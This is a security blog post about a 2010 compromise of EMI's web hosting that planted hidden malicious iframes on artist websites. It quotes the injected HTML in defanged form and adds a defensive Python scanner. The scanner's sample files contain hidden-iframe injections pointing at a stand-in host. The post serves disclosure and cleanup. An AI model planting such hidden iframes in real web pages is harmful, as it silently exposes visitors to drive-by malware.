EMI Music is one of the world’s leading music companies with many successful record labels and signed popular artists that include The Beatles, Depeche Mode, Gorillaz, Iron Maiden, Kylie Minogue, Pink Floyd, Queen, Snoop Dogg and many more. They have their own web hosting subsidiary EMIHosting.com that provides web space for EMI’s websites and many official websites of EMI artists.
In the beginning of this September, EMIHosting.com was attacked by hackers. As a result, more than a hundred websites on a server with the IP address 195 .225 .83 .57 were infected with a malicious iframe. Google’s diagnostics page for AS34401 (EMIMUSICGROUP) says:
Of the 279 site(s) we tested on this network over the past 90 days, 112 site(s), including, for example, richardhawleyforum.co.uk/, emirecords.co.uk/, emimusic.co.uk/, served content that resulted in malicious software being downloaded and installed without user consent.
Among other infected domains (all links point to Google’s diagnostic pages) are EMI Classics and Virgin Classics, as well as the official sites of Pink Floyd, David Gilmour, Gorillaz, Massive Attack, Coldplay and Bryan Ferry. Most of them have already been cleaned up and unblocked by Google. However, some sites remain blacklisted because their owners didn’t request a malware review, for example the sites of Kate Bush and Ray Charles’ “Genius loves company” album.
At least 15 sites that I checked myself still contain malicious iframes, either in all web pages or in certain sections of the site. As of September 25th, 2010, the following sites are still dangerous for web surfers (links point to real-time Unmask Parasites reports):
Note that all infected sites have this hidden iframe from “hxxp://virtuellvorun .org/zl/s2”, and all Google diagnostic pages report the “virtuellvorun .org” domain as the source of the problem.
The actual injected HTML code is
<div style="visibility:hidden"><ifr ame src="hxxp://virtuellvorun .org/zl/s2" width=100 height=80></ifram e></div>
(the tags and the URL are deliberately broken here so that the snippet cannot render). It can be found in different parts of the web page code. Note that visibility:hidden only hides the frame from the visitor: the browser still requests and renders the page at that URL, so whatever exploit code it carries runs as soon as the infected page is opened.
One more interesting observation: on most websites, the malicious code was first detected on September 5th and 6th. This is probably when the attack took place. According to Google’s Safe Browsing service, the same “virtuellvorun .org” domain was the source of infection for the hacked TechCrunch sites (MobileCrunch, CrunchGear, TechCrunch Europe) in exactly the same period (September 6th).
Here’s what I think could have happened. Around September 5th, hackers used a security hole in one of the EMI-hosted sites (many of them use old versions of phpBB and WordPress) to upload backdoor scripts and/or web shells. Then they used the uploaded scripts to find more sites with weak file permissions and infected them. Then EMI Hosting admins detected the hack and tried to clean up the infected sites. Unfortunately, they didn’t try to run server-wide scans and missed quite a few sites with malicious injections.
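As an added example (not code from the original article or from EMI Hosting), here is the kind of server-wide scan the scenario above calls for. It walks a shared web root, flags every page in which an iframe sits inside a hidden div or span, and records each file’s modification time (to correlate with the September 5th/6th dates) and whether the file is world-writable (the weak permissions that let one compromised site infect its neighbours). The sample pages, the directory layout and the “malicious.example” domain are constructed stand-ins for the real infected files and the real injection domain; the pattern assumes the iframe immediately follows its hidden container, as in the injection quoted above.

```python
"""Server-wide scan for hidden-iframe injections on a shared web host.

Added example; not code from the original article or from EMI Hosting.
The sample pages, the 'malicious.example' domain and the directory layout
below are constructed stand-ins for the real infected files.
"""
import os
import re
import stat
import tempfile
from datetime import datetime, timezone

# A hidden container (visibility:hidden or display:none) immediately
# followed by an iframe. The iframe's src is captured so the same
# malicious host can be correlated across every file on the server.
HIDDEN_IFRAME_RE = re.compile(
    r"<(?:div|span)\b[^>]*\bstyle\s*=\s*[\"']?[^>]*?"
    r"(?:visibility\s*:\s*hidden|display\s*:\s*none)[^>]*>"
    r"\s*<iframe\b[^>]*\bsrc\s*=\s*[\"']?([^\"'\s>]+)",
    re.IGNORECASE,
)

# File types that carry rendered HTML on a typical PHP shared host.
SCAN_EXTENSIONS = {".php", ".html", ".htm", ".tpl", ".js"}


def find_hidden_iframes(html):
    """Return the src URLs of iframes wrapped in a hidden div/span."""
    return HIDDEN_IFRAME_RE.findall(html)


def scan_webroot(root):
    """Walk every site under root and report files with hidden iframes.

    Each finding records the relative path, the iframe source(s), the
    file's last modification time (UTC) and whether the file is
    world-writable, which is how one hacked site on a shared server can
    be used to infect its neighbours.
    """
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in SCAN_EXTENSIONS:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                srcs = find_hidden_iframes(fh.read())
            if not srcs:
                continue
            st = os.stat(path)
            findings.append({
                "path": os.path.relpath(path, root),
                "iframe_src": sorted(set(srcs)),
                "modified": datetime.fromtimestamp(st.st_mtime, timezone.utc).isoformat(),
                "world_writable": bool(st.st_mode & stat.S_IWOTH),
            })
    return sorted(findings, key=lambda f: f["path"])


# Constructed sample web root: two clean files and two infected ones; the
# second infection uses a display:none variant, unquoted attributes and
# upper-case tags to show the pattern is not tied to one exact string.
SAMPLE_FILES = {
    "site1/index.html": "<html><body><h1>Official site</h1></body></html>\n",
    "site1/forum/footer.php": (
        "<?php echo $copyright; ?>\n"
        '<div style="visibility:hidden"><iframe src="http://malicious.example/zl/s2" '
        "width=100 height=80></iframe></div>\n</body></html>\n"
    ),
    "site2/wp-content/themes/band/header.php": (
        "<body>\n<DIV style='display:none'>\n"
        "<IFRAME src=http://malicious.example/zl/s2 width=0 height=0></IFRAME></DIV>\n"
    ),
    "site2/wp-content/themes/band/style.css": "body { color: #000; }\n",
}


def build_sample_webroot():
    """Write the constructed files to a temp dir; make one world-writable."""
    root = tempfile.mkdtemp(prefix="webroot_")
    for rel, content in SAMPLE_FILES.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
        os.chmod(path, 0o644)
    # Simulate the weak permissions an attacker on a neighbouring site abuses.
    os.chmod(os.path.join(root, "site2", "wp-content", "themes", "band", "header.php"), 0o666)
    return root


if __name__ == "__main__":
    for f in scan_webroot(build_sample_webroot()):
        flag = " [WORLD-WRITABLE]" if f["world_writable"] else ""
        print(f"{f['path']}  ->  {', '.join(f['iframe_src'])}  ({f['modified']}){flag}")
```

Run it against the real document root of the server (not the temp directory) and review each hit by hand: a few legitimate pages also hide iframes, so the scan narrows the search rather than proving infection. Once one malicious host is confirmed, a second pass that greps every file type for that hostname catches injections that do not use a hidden container at all.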
I hope this article will help EMI Hosting find and clean up those still infected sites and consider hardening their servers and refining their security policy to prevent future server-wide hacks — after all they host quite popular sites and such hacker attacks expose a lot of music fans to malware.
As you can see, even big, reputable sites can distribute malware. You should be prepared for any website you visit to try to silently install something malicious on your computer. To minimize the risk of such an infection, keep your system (OS, browser, plugins, Flash, Java, Adobe Reader, etc.) up to date and fully patched. Moreover, I suggest that you use NoScript on Firefox — this highly customizable extension effectively blocks any active content from untrusted locations; in this particular case your browser would simply ignore that malicious iframe.
Do you know any details about those EMI/TechCrunch hacks? What do you think about them? Your comments are welcome.